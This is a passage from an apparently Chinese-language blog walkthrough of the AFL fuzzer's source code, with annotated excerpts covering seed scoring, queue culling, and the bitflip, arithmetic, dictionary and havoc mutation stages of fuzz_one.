very normally and do not have to be treated as volatile. */ MEM_BARRIER(); tb4 = *(u32 *)trace_bits; #ifdef WORD_SIZE_64 classify_counts((u64 *)trace_bits);#else classify_counts((u32 *)trace_bits);#endif /* ^WORD_SIZE_64 */ prev_timed_out = child_timed_out; /* Report outcome to caller. */ if (WIFSIGNALED(status) && !stop_soon) { // 根据信号判断错误类型 kill_signal = WTERMSIG(status); if (child_timed_out && kill_signal == SIGKILL) return FAULT_TMOUT; return FAULT_CRASH; } /* A somewhat nasty hack for MSAN, which doesn't support abort_on_error and must use a special exit code. */ if (uses_asan && WEXITSTATUS(status) == MSAN_ERROR) { // 根据exitstatus判断错误类型 kill_signal = 0; return FAULT_CRASH; } if ((dumb_mode == 1 || no_forkserver) && tb4 == EXEC_FAIL_SIG) return FAULT_ERROR; /* It makes sense to account for the slowest units only if the testcase was run under the user defined timeout. 
*/ if (!(timeout > exec_tmout) && (slowest_exec_ms < exec_ms)) { slowest_exec_ms = exec_ms; } // 如果顺利运行到最后,说明没有错误 return FAULT_NONE;} update_bitmap_score 这部分涉及到了AFL维护的一个static struct queue_entry *top_rated[MAP_SIZE] 数组,这个数组记录了每个bitmap中的一项(也就是每个基本块)对应的最favored的testcase。 这个favored score由执行时间和长度相乘得到。 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849static void update_bitmap_score(struct queue_entry *q){ u32 i; u64 fav_factor = q->exec_us * q->len; /* For every byte set in trace_bits[], see if there is a previous winner, and how it compares to us. */ for (i = 0; i < MAP_SIZE; i++) if (trace_bits[i]) { if (top_rated[i]) { /* Faster-executing or smaller test cases are favored. */ // favored score由执行时间和长度相乘得到。越小越好 if (fav_factor > top_rated[i]->exec_us * top_rated[i]->len) continue; /* Looks like we're going to win. Decrease ref count for the previous winner, discard its trace_bits[] if necessary. */ if (!--top_rated[i]->tc_ref) { ck_free(top_rated[i]->trace_mini); top_rated[i]->trace_mini = 0; } } /* Insert ourselves as the new winner. */ top_rated[i] = q; q->tc_ref++; // 如果更favored,则更新top_rated数组 if (!q->trace_mini) { q->trace_mini = ck_alloc(MAP_SIZE >> 3); minimize_bits(q->trace_mini, trace_bits); // 压缩trace_bits为bitmap } score_changed = 1; // 设置flag为1 }} cull_queue | 挑选更好的种子 此函数通过标记更favored 的种子,使得favored的种子得到更大的运行概率 123456789101112131415161718static void cull_queue(void){ struct queue_entry *q; static u8 temp_v[MAP_SIZE >> 3]; u32 i; if (dumb_mode || !score_changed) return; score_changed = 0; memset(temp_v, 255, MAP_SIZE >> 3); queued_favored = 0; pending_favored = 0; q = queue; 首先清空每个queue实体的favored 12345while (q){ q->favored = 0; q = q->next;} tmep_v数组用来标识没有遍历到的区域,以下循环将所有存在不同分支的种子筛选出来, 1234567891011121314151617181920 for (i = 0; i < MAP_SIZE; i++) if (top_rated[i] && (temp_v[i >> 3] & (1 << (i & 7)))) {// 判断favored种子遍历的区域,是否已经在之前筛选出了(将对应的temp_v置为0了) u32 j = MAP_SIZE >> 3; /* Remove all bits belonging to the current entry from temp_v. */ // 然后将所有当前种子遍历过的区域从temp_v中去除 while (j--) if (top_rated[i]->trace_mini[j]) temp_v[j] &= ~top_rated[i]->trace_mini[j]; top_rated[i]->favored = 1; // 然后增加其favored值 queued_favored++; if (!top_rated[i]->was_fuzzed) pending_favored++; } 123456789q = queue;// 对于不favored的,通过创建redundant文件的方式表明此种子是多余的while (q){ mark_as_redundant(q, !q->favored); q = q->next;} fuzz_one | 种子的变异 此函数用于从queue中选取一个种子,对种子进行变异,返回0说明运行成功,否则运行失败 首先进行了一些细节的处理, 包括: 首先判断是否要跳过当前testcase给favored的testcase更多运行机会 如果存在 pending_favored , 并且当前queue已经运行过或者不favored,那么为了将时间留给pending_favored的testcase, 有99%的几率直接跳过当前种子 如果无pending_favored, 对于不是favored的testcase, 如果已经fuzz过, 95%概率跳过, 如果没有fuzz过, 75%概率跳过 如果是favored, 不跳过 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192static u8 fuzz_one(char **argv){ s32 len, fd, temp_len, i, j; u8 *in_buf, *out_buf, *orig_in, *ex_tmp, *eff_map = 0; u64 havoc_queued, orig_hit_cnt, new_hit_cnt; u32 splice_cycle = 0, perf_score = 100, orig_perf, prev_cksum, eff_cnt = 1; u8 ret_val = 1, doing_det = 0; u8 a_collect[MAX_AUTO_EXTRA]; u32 a_len = 0;#ifdef IGNORE_FINDS /* In IGNORE_FINDS mode, skip any entries that weren't in the initial data set. */ if (queue_cur->depth > 1) return 1;#else if (pending_favored) { /* If we have any favored, non-fuzzed new arrivals in the queue, possibly skip to them at the expense of already-fuzzed or non-favored cases. 
*/ if ((queue_cur->was_fuzzed || !queue_cur->favored) && UR(100) < SKIP_TO_NEW_PROB) return 1; } else if (!dumb_mode && !queue_cur->favored && queued_paths > 10) { /* Otherwise, still possibly skip non-favored cases, albeit less often. The odds of skipping stuff are higher for already-fuzzed inputs and lower for never-fuzzed entries. */ if (queue_cycle > 1 && !queue_cur->was_fuzzed) { if (UR(100) < SKIP_NFAV_NEW_PROB) // random(0, 100) < 75 ; 75% return 1; } else { if (UR(100) < SKIP_NFAV_OLD_PROB) // random(0, 100) < 95 ; 95% return 1; } } // 判断需要跳过的情形#endif /* ^IGNORE_FINDS */ if (not_on_tty) { ACTF("Fuzzing test case #%u (%u total, %llu uniq crashes found)...", current_entry, queued_paths, unique_crashes); fflush(stdout); } /* Map the test case into memory. */ // 将testcase映射进内存 fd = open(queue_cur->fname, O_RDONLY); if (fd < 0) PFATAL("Unable to open '%s'", queue_cur->fname); len = queue_cur->len; orig_in = in_buf = mmap(0, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (orig_in == MAP_FAILED) PFATAL("Unable to mmap '%s'", queue_cur->fname); close(fd); /* We could mmap() out_buf as MAP_PRIVATE, but we end up clobbering every single byte anyway, so it wouldn't give us any performance or memory usage benefits. */ out_buf = ck_alloc_nozero(len); subseq_tmouts = 0; cur_depth = queue_cur->depth; 如果之前cal_failed, 那么要再运行一次 calibrate_case 来校准testcase 1234567891011121314151617181920212223242526if (queue_cur->cal_failed){ u8 res = FAULT_TMOUT; if (queue_cur->cal_failed < CAL_CHANCES) { /* Reset exec_cksum to tell calibrate_case to re-execute the testcase avoiding the usage of an invalid trace_bits. For more info: https://github.com/AFLplusplus/AFLplusplus/pull/425 */ queue_cur->exec_cksum = 0; res = calibrate_case(argv, queue_cur, in_buf, queue_cycle - 1, 0); if (res == FAULT_ERROR) FATAL("Unable to execute target application"); } if (stop_soon || res != crash_mode) { cur_skipped_paths++; goto abandon_entry; }} 接下来通过trim_case 来修剪并运行testcase 1234567891011121314151617181920212223if (!dumb_mode && !queue_cur->trim_done){ u8 res = trim_case(argv, queue_cur, in_buf); if (res == FAULT_ERROR) FATAL("Unable to execute target application"); if (stop_soon) { cur_skipped_paths++; goto abandon_entry; } /* Don't retry trimming, even if it failed. */ queue_cur->trim_done = 1; if (len != queue_cur->len) len = queue_cur->len;}memcpy(out_buf, in_buf, len); 通过calculate_score 计算分数 1orig_perf = perf_score = calculate_score(queue_cur); 接下来进入真正的变异阶段 确定性变异 首先判断是否需要跳过确定性(deterministic)变异阶段,这部分变异没有随机性,是所有种子都要经历的阶段 12345678910if (skip_deterministic || queue_cur->was_fuzzed || queue_cur->passed_det) goto havoc_stage;/* Skip deterministic fuzzing if exec path checksum puts this out of scope for this master instance. 
*/if (master_max && (queue_cur->exec_cksum % master_max) != master_id - 1) goto havoc_stage;doing_det = 1; deterministic 阶段分为以下几个部分: bitflip bitflip阶段是对于testcase的bit位进行翻转 bitflip 1/1 通过每次翻转一个bit,来检查是否具有类似于 “ELF” 此类魔数。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768 stage_short = "flip1"; stage_max = len << 3; stage_name = "bitflip 1/1"; stage_val_type = STAGE_VAL_NONE; orig_hit_cnt = queued_paths + unique_crashes; prev_cksum = queue_cur->exec_cksum; for (stage_cur = 0; stage_cur < stage_max; stage_cur++) { stage_cur_byte = stage_cur >> 3; FLIP_BIT(out_buf, stage_cur);// 每次翻转一个 bit if (common_fuzz_stuff(argv, out_buf, len)) // 运行一次fuzz测试 goto abandon_entry; FLIP_BIT(out_buf, stage_cur);// 翻转回来 if (!dumb_mode && (stage_cur & 7) == 7) {// 根据经验,通常检查最低位的翻转最有效率 u32 cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); // 获取cksum if (stage_cur == stage_max - 1 && cksum == prev_cksum) { /* If at end of file and we are still collecting a string, grab the final character and force output. */ if (a_len < MAX_AUTO_EXTRA) a_collect[a_len] = out_buf[stage_cur >> 3]; a_len++; if (a_len >= MIN_AUTO_EXTRA && a_len <= MAX_AUTO_EXTRA) maybe_add_auto(a_collect, a_len); } else if (cksum != prev_cksum) { // 如果cksum不等于prev_cksum,可能是一个魔数的开始或者结束 /* Otherwise, if the checksum has changed, see if we have something worthwhile queued up, and collect that if the answer is yes. */ if (a_len >= MIN_AUTO_EXTRA && a_len <= MAX_AUTO_EXTRA) maybe_add_auto(a_collect, a_len); // 如果是一个魔数的结束 // 那么调用 may_add_auto收集起来 a_len = 0; prev_cksum = cksum; } /* Continue collecting string, but only if the bit flip actually made any difference - we don't want no-op tokens. */ if (cksum != queue_cur->exec_cksum) { // 需要cksum不等于原来才需要增加a_len并记录 if (a_len < MAX_AUTO_EXTRA) a_collect[a_len] = out_buf[stage_cur >> 3]; a_len++; } } } bitflip 2/1 每次翻转两个bit,运行并保留有价值的种子 1234567891011121314151617181920212223242526stage_name = "bitflip 2/1";stage_short = "flip2";stage_max = (len << 3) - 1;orig_hit_cnt = new_hit_cnt;for (stage_cur = 0; stage_cur < stage_max; stage_cur++){ stage_cur_byte = stage_cur >> 3; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1); // 翻转两个bit if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1);}new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP2] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP2] += stage_max; bitflip 4/1 每次翻转4个bit,运行并保留有价值的种子 1234567891011121314151617181920212223242526272829stage_name = "bitflip 4/1";stage_short = "flip4";stage_max = (len << 3) - 3;orig_hit_cnt = new_hit_cnt;for (stage_cur = 0; stage_cur < stage_max; stage_cur++){ stage_cur_byte = stage_cur >> 3; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1); FLIP_BIT(out_buf, stage_cur + 2); FLIP_BIT(out_buf, stage_cur + 3); if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1); FLIP_BIT(out_buf, stage_cur + 2); FLIP_BIT(out_buf, stage_cur + 3);}new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP4] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP4] += stage_max; bitflip 8/8 每次反转一整个byte,并记录那些即使全部翻转也对执行路径没有影响的byte,避免在之后花费时间去测试 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576/* Walking byte. 
*/stage_name = "bitflip 8/8";stage_short = "flip8";stage_max = len;orig_hit_cnt = new_hit_cnt;for (stage_cur = 0; stage_cur < stage_max; stage_cur++){ stage_cur_byte = stage_cur; out_buf[stage_cur] ^= 0xFF; // 每次翻转一个byte if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; // 运行测试 /* We also use this stage to pull off a simple trick: we identify bytes that seem to have no effect on the current execution path even when fully flipped - and we skip them during more expensive deterministic stages, such as arithmetics or known ints. */ if (!eff_map[EFF_APOS(stage_cur)]) { u32 cksum; /* If in dumb mode or if the file is very short, just flag everything without wasting time on checksums. */ if (!dumb_mode && len >= EFF_MIN_LEN) cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); else cksum = ~queue_cur->exec_cksum; if (cksum != queue_cur->exec_cksum) { // 用来区分一些无效byte,为后面的阶段做准备 eff_map[EFF_APOS(stage_cur)] = 1; eff_cnt++; // 通过一个eff_map 来标记有效byte } } out_buf[stage_cur] ^= 0xFF; // 还原byte}/* If the effector map is more than EFF_MAX_PERC dense, just flag the whole thing as worth fuzzing, since we wouldn't be saving much time anyway. */if (eff_cnt != EFF_ALEN(len) && eff_cnt * 100 / EFF_ALEN(len) > EFF_MAX_PERC){ // 如果eff_map 大于 EFF_MAX_PERC // 那么直接把整个testcase标记为值得fuzz的,这不会多浪费多少时间 memset(eff_map, 1, EFF_ALEN(len)); blocks_eff_select += EFF_ALEN(len);}else{ blocks_eff_select += eff_cnt;}blocks_eff_total += EFF_ALEN(len);new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP8] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP8] += stage_max; 接下来是 bitflip 16/8 处理类似 12345678910111213141516171819202122232425262728293031323334if (len < 2) goto skip_bitflip;stage_name = "bitflip 16/8";stage_short = "flip16";stage_cur = 0;stage_max = len - 1;orig_hit_cnt = new_hit_cnt;for (i = 0; i < len - 1; i++) { /* Let's consult the effector map... */ if (!eff_map[EFF_APOS(i)] && !eff_map[EFF_APOS(i + 1)]) { stage_max--; continue; } stage_cur_byte = i; *(u16*)(out_buf + i) ^= 0xFFFF; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; *(u16*)(out_buf + i) ^= 0xFFFF;}new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP16] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP16] += stage_max; 然后是 bitflip 32/8,逻辑相同 1234567891011121314151617181920212223242526272829303132333435if (len < 4) goto skip_bitflip;/* Four walking bytes. */stage_name = "bitflip 32/8";stage_short = "flip32";stage_cur = 0;stage_max = len - 3;orig_hit_cnt = new_hit_cnt;for (i = 0; i < len - 3; i++) { /* Let's consult the effector map... */ if (!eff_map[EFF_APOS(i)] && !eff_map[EFF_APOS(i + 1)] && !eff_map[EFF_APOS(i + 2)] && !eff_map[EFF_APOS(i + 3)]) { stage_max--; continue; } stage_cur_byte = i; *(u32*)(out_buf + i) ^= 0xFFFFFFFF; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; *(u32*)(out_buf + i) ^= 0xFFFFFFFF;}new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP32] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP32] += stage_max; 以上,第一个bitflip阶段就完成了 ARITHMETIC INC/DEC 这个阶段是算数加减阶段 首先是 arith 8/8 , 对一个byte大小的数据进行加减 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263 stage_name = "arith 8/8"; stage_short = "arith8"; stage_cur = 0; stage_max = 2 * len * ARITH_MAX; stage_val_type = STAGE_VAL_LE; orig_hit_cnt = new_hit_cnt; for (i = 0; i < len; i++) { u8 orig = out_buf[i]; /* Let's consult the effector map... 
*/ if (!eff_map[EFF_APOS(i)]) { stage_max -= 2 * ARITH_MAX; continue; // 如果不是有效位置,那么就避免进行变异 } stage_cur_byte = i; for (j = 1; j <= ARITH_MAX; j++) { // 这里的 ARITH_MAX 是35 u8 r = orig ^ (orig + j); /* Do arithmetic operations only if the result couldn't be a product of a bitflip. */ // 并且要确保进行算术运算后的值不可以经过bitflip得到,避免重复变异 if (!could_be_bitflip(r)) { stage_cur_val = j; out_buf[i] = orig + j; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; } else stage_max--; r = orig ^ (orig - j); if (!could_be_bitflip(r)) { stage_cur_val = -j; out_buf[i] = orig - j; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; } else stage_max--; out_buf[i] = orig;// 加减法都尝试一次 } } new_hit_cnt = queued_paths + unique_crashes; stage_finds[STAGE_ARITH8] += new_hit_cnt - orig_hit_cnt; stage_cycles[STAGE_ARITH8] += stage_max; 然后还有 arith 16/8 arith 32/8 分别进行16位和32位的加减, 这里不过多赘述 INTERESTING VALUES 这一步主要是使用一些有意义的值来替换 首先是 interest 8/8 用interest值替换一个8位 123456789101112131415161718192021222324252627282930313233343536373839404142434445stage_name = "interest 8/8";stage_short = "int8";stage_cur = 0;stage_max = len * sizeof(interesting_8);stage_val_type = STAGE_VAL_LE;orig_hit_cnt = new_hit_cnt;/* Setting 8-bit integers. */for (i = 0; i < len; i++) { u8 orig = out_buf[i]; /* Let's consult the effector map... */ if (!eff_map[EFF_APOS(i)]) { stage_max -= sizeof(interesting_8); continue; } stage_cur_byte = i; for (j = 0; j < sizeof(interesting_8); j++) { /* Skip if the value could be a product of bitflips or arithmetics. */ if (could_be_bitflip(orig ^ (u8)interesting_8[j]) || could_be_arith(orig, (u8)interesting_8[j], 1)) { stage_max--; continue; } stage_cur_val = interesting_8[j]; out_buf[i] = interesting_8[j]; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; out_buf[i] = orig; stage_cur++; }} 同样的,还有: interest 16/8 interest 32/8 DICTIONARY STUFF 这一阶段是使用字典或者之前得到的有意义的extras替换种子的内容 首先是替换为extras 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263/******************** * DICTIONARY STUFF * ********************/if (!extras_cnt) goto skip_user_extras;/* Overwrite with user-supplied extras. */stage_name = "user extras (over)";stage_short = "ext_UO";stage_cur = 0;stage_max = extras_cnt * len;stage_val_type = STAGE_VAL_NONE;orig_hit_cnt = new_hit_cnt;for (i = 0; i < len; i++) { u32 last_len = 0; stage_cur_byte = i; /* Extras are sorted by size, from smallest to largest. This means that we don't have to worry about restoring the buffer in between writes at a particular offset determined by the outer loop. */ for (j = 0; j < extras_cnt; j++) { /* Skip extras probabilistically if extras_cnt > MAX_DET_EXTRAS. Also skip them if there's no room to insert the payload, if the token is redundant, or if its entire span has no bytes set in the effector map. */ if ((extras_cnt > MAX_DET_EXTRAS && UR(extras_cnt) >= MAX_DET_EXTRAS) || extras[j].len > len - i || !memcmp(extras[j].data, out_buf + i, extras[j].len) || !memchr(eff_map + EFF_APOS(i), 1, EFF_SPAN_ALEN(i, extras[j].len))) { stage_max--; continue; } last_len = extras[j].len; memcpy(out_buf + i, extras[j].data, last_len); if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; } /* Restore all the clobbered memory. 
*/ memcpy(out_buf + i, in_buf + i, last_len);}new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_UO] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_UO] += stage_max; 或者插入extras 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_UO] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_UO] += stage_max;/* Insertion of user-supplied extras. */stage_name = "user extras (insert)";stage_short = "ext_UI";stage_cur = 0;stage_max = extras_cnt * (len + 1);orig_hit_cnt = new_hit_cnt;ex_tmp = ck_alloc(len + MAX_DICT_FILE);for (i = 0; i <= len; i++) { stage_cur_byte = i; for (j = 0; j < extras_cnt; j++) { if (len + extras[j].len > MAX_FILE) { stage_max--; continue; } /* Insert token */ memcpy(ex_tmp + i, extras[j].data, extras[j].len); /* Copy tail */ memcpy(ex_tmp + i + extras[j].len, out_buf + i, len - i); if (common_fuzz_stuff(argv, ex_tmp, len + extras[j].len)) { ck_free(ex_tmp); goto abandon_entry; } stage_cur++; } /* Copy head */ ex_tmp[i] = out_buf[i];}ck_free(ex_tmp);new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_UI] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_UI] += stage_max; 最后尝试之前变异阶段得到的extras: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748if (!a_extras_cnt) goto skip_extras;stage_name = "auto extras (over)";stage_short = "ext_AO";stage_cur = 0;stage_max = MIN(a_extras_cnt, USE_AUTO_EXTRAS) * len;stage_val_type = STAGE_VAL_NONE;orig_hit_cnt = new_hit_cnt;for (i = 0; i < len; i++) { u32 last_len = 0; stage_cur_byte = i; for (j = 0; j < MIN(a_extras_cnt, USE_AUTO_EXTRAS); j++) { /* See the comment in the earlier code; extras are sorted by size. */ if (a_extras[j].len > len - i || !memcmp(a_extras[j].data, out_buf + i, a_extras[j].len) || !memchr(eff_map + EFF_APOS(i), 1, EFF_SPAN_ALEN(i, a_extras[j].len))) { stage_max--; continue; } last_len = a_extras[j].len; memcpy(out_buf + i, a_extras[j].data, last_len); if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; } /* Restore all the clobbered memory. */ memcpy(out_buf + i, in_buf + i, last_len);}new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_EXTRAS_AO] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_EXTRAS_AO] += stage_max; Havoc Stage havoc是不确定的大变异 首先,由于splice阶段也会进行havoc,所以要进行区分此时是直接运行的havoc还是splice阶段运行的 1234567891011121314151617181920212223242526272829303132stage_cur_byte = -1;/* The havoc stage mutation code is also invoked when splicing files; if the splice_cycle variable is set, generate different descriptions and such. */if (!splice_cycle) { stage_name = "havoc"; stage_short = "havoc"; stage_max = (doing_det ? 
HAVOC_CYCLES_INIT : HAVOC_CYCLES) * perf_score / havoc_div / 100;} else { static u8 tmp[32]; perf_score = orig_perf; sprintf(tmp, "splice %u", splice_cycle); stage_name = tmp; stage_short = "splice"; stage_max = SPLICE_HAVOC * perf_score / havoc_div / 100;}if (stage_max < HAVOC_MIN) stage_max = HAVOC_MIN;temp_len = len;orig_hit_cnt = queued_paths + unique_crashes;havoc_queued = queued_paths; 接下来是一系列变异循环: 首先,这里有两个循环,外层循环控制测试运行次数,内层循环控制变异个数 在内层循环中,通过随机数来选择一种变异策略,策略包括翻转、加减、随机插入等等 在经过n次随机变异后,再通过common_fuzz_stuff 运行测试 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405for (stage_cur = 0; stage_cur < stage_max; stage_cur++) { u32 use_stacking = 1 << (1 + UR(HAVOC_STACK_POW2)); stage_cur_val = use_stacking; for (i = 0; i < use_stacking; i++) { switch (UR(15 + ((extras_cnt + a_extras_cnt) ? 2 : 0))) { case 0: /* Flip a single bit somewhere. Spooky! */ FLIP_BIT(out_buf, UR(temp_len << 3)); break; case 1: /* Set byte to interesting value. */ out_buf[UR(temp_len)] = interesting_8[UR(sizeof(interesting_8))]; break; case 2: /* Set word to interesting value, randomly choosing endian. */ if (temp_len < 2) break; if (UR(2)) { *(u16*)(out_buf + UR(temp_len - 1)) = interesting_16[UR(sizeof(interesting_16) >> 1)]; } else { *(u16*)(out_buf + UR(temp_len - 1)) = SWAP16( interesting_16[UR(sizeof(interesting_16) >> 1)]); } break; case 3: /* Set dword to interesting value, randomly choosing endian. */ if (temp_len < 4) break; if (UR(2)) { *(u32*)(out_buf + UR(temp_len - 3)) = interesting_32[UR(sizeof(interesting_32) >> 2)]; } else { *(u32*)(out_buf + UR(temp_len - 3)) = SWAP32( interesting_32[UR(sizeof(interesting_32) >> 2)]); } break; case 4: /* Randomly subtract from byte. */ out_buf[UR(temp_len)] -= 1 + UR(ARITH_MAX); break; case 5: /* Randomly add to byte. */ out_buf[UR(temp_len)] += 1 + UR(ARITH_MAX); break; case 6: /* Randomly subtract from word, random endian. */ if (temp_len < 2) break; if (UR(2)) { u32 pos = UR(temp_len - 1); *(u16*)(out_buf + pos) -= 1 + UR(ARITH_MAX); } else { u32 pos = UR(temp_len - 1); u16 num = 1 + UR(ARITH_MAX); *(u16*)(out_buf + pos) = SWAP16(SWAP16(*(u16*)(out_buf + pos)) - num); } break; case 7: /* Randomly add to word, random endian. 
*/ if (temp_len < 2) break; if (UR(2)) { u32 pos = UR(temp_len - 1); *(u16*)(out_buf + pos) += 1 + UR(ARITH_MAX); } else { u32 pos = UR(temp_len - 1); u16 num = 1 + UR(ARITH_MAX); *(u16*)(out_buf + pos) = SWAP16(SWAP16(*(u16*)(out_buf + pos)) + num); } break; case 8: /* Randomly subtract from dword, random endian. */ if (temp_len < 4) break; if (UR(2)) { u32 pos = UR(temp_len - 3); *(u32*)(out_buf + pos) -= 1 + UR(ARITH_MAX); } else { u32 pos = UR(temp_len - 3); u32 num = 1 + UR(ARITH_MAX); *(u32*)(out_buf + pos) = SWAP32(SWAP32(*(u32*)(out_buf + pos)) - num); } break; case 9: /* Randomly add to dword, random endian. */ if (temp_len < 4) break; if (UR(2)) { u32 pos = UR(temp_len - 3); *(u32*)(out_buf + pos) += 1 + UR(ARITH_MAX); } else { u32 pos = UR(temp_len - 3); u32 num = 1 + UR(ARITH_MAX); *(u32*)(out_buf + pos) = SWAP32(SWAP32(*(u32*)(out_buf + pos)) + num); } break; case 10: /* Just set a random byte to a random value. Because, why not. We use XOR with 1-255 to eliminate the possibility of a no-op. */ out_buf[UR(temp_len)] ^= 1 + UR(255); break; case 11 ... 12: { /* Delete bytes. We're making this a bit more likely than insertion (the next option) in hopes of keeping files reasonably small. */ u32 del_from, del_len; if (temp_len < 2) break; /* Don't delete too much. */ del_len = choose_block_len(temp_len - 1); del_from = UR(temp_len - del_len + 1); memmove(out_buf + del_from, out_buf + del_from + del_len, temp_len - del_from - del_len); temp_len -= del_len; break; } case 13: if (temp_len + HAVOC_BLK_XL < MAX_FILE) { /* Clone bytes (75%) or insert a block of constant bytes (25%). */ u8 actually_clone = UR(4); u32 clone_from, clone_to, clone_len; u8* new_buf; if (actually_clone) { clone_len = choose_block_len(temp_len); clone_from = UR(temp_len - clone_len + 1); } else { clone_len = choose_block_len(HAVOC_BLK_XL); clone_from = 0; } clone_to = UR(temp_len); new_buf = ck_alloc_nozero(temp_len + clone_len); /* Head */ memcpy(new_buf, out_buf, clone_to); /* Inserted part */ if (actually_clone) memcpy(new_buf + clone_to, out_buf + clone_from, clone_len); else memset(new_buf + clone_to, UR(2) ? UR(256) : out_buf[UR(temp_len)], clone_len); /* Tail */ memcpy(new_buf + clone_to + clone_len, out_buf + clone_to, temp_len - clone_to); ck_free(out_buf); out_buf = new_buf; temp_len += clone_len; } break; case 14: { /* Overwrite bytes with a randomly selected chunk (75%) or fixed bytes (25%). */ u32 copy_from, copy_to, copy_len; if (temp_len < 2) break; copy_len = choose_block_len(temp_len - 1); copy_from = UR(temp_len - copy_len + 1); copy_to = UR(temp_len - copy_len + 1); if (UR(4)) { if (copy_from != copy_to) memmove(out_buf + copy_to, out_buf + copy_from, copy_len); } else memset(out_buf + copy_to, UR(2) ? UR(256) : out_buf[UR(temp_len)], copy_len); break; } /* Values 15 and 16 can be selected only if there are any extras present in the dictionaries. */ case 15: { /* Overwrite bytes with an extra. */ if (!extras_cnt || (a_extras_cnt && UR(2))) { /* No user-specified extras or odds in our favor. Let's use an auto-detected one. */ u32 use_extra = UR(a_extras_cnt); u32 extra_len = a_extras[use_extra].len; u32 insert_at; if (extra_len > temp_len) break; insert_at = UR(temp_len - extra_len + 1); memcpy(out_buf + insert_at, a_extras[use_extra].data, extra_len); } else { /* No auto extras or odds in our favor. Use the dictionary. 
*/ u32 use_extra = UR(extras_cnt); u32 extra_len = extras[use_extra].len; u32 insert_at; if (extra_len > temp_len) break; insert_at = UR(temp_len - extra_len + 1); memcpy(out_buf + insert_at, extras[use_extra].data, extra_len); } break; } case 16: { u32 use_extra, extra_len, insert_at = UR(temp_len + 1); u8* new_buf; /* Insert an extra. Do the same dice-rolling stuff as for the previous case. */ if (!extras_cnt || (a_extras_cnt && UR(2))) { use_extra = UR(a_extras_cnt); extra_len = a_extras[use_extra].len; if (temp_len + extra_len >= MAX_FILE) break; new_buf = ck_alloc_nozero(temp_len + extra_len); /* Head */ memcpy(new_buf, out_buf, insert_at); /* Inserted part */ memcpy(new_buf + insert_at, a_extras[use_extra].data, extra_len); } else { use_extra = UR(extras_cnt); extra_len = extras[use_extra].len; if (temp_len + extra_len >= MAX_FILE) break; new_buf = ck_alloc_nozero(temp_len + extra_len); /* Head */ memcpy(new_buf, out_buf, insert_at); /* Inserted part */ memcpy(new_buf + insert_at, extras[use_extra].data, extra_len); } /* Tail */ memcpy(new_buf + insert_at + extra_len, out_buf + insert_at, temp_len - insert_at); ck_free(out_buf); out_buf = new_buf; temp_len += extra_len; break; } } } if (common_fuzz_stuff(argv, out_buf, temp_len)) goto abandon_entry; /* out_buf might have been mangled a bit, so let's restore it to its original size and shape. */ if (temp_len < len) out_buf = ck_realloc(out_buf, len); temp_len = len; memcpy(out_buf, in_buf, len); /* If we're finding new stuff, let's run for a bit longer, limits permitting. */ if (queued_paths != havoc_queued) { if (perf_score <= HAVOC_MAX_MULT * 100) { stage_max *= 2; perf_score *= 2; } havoc_queued = 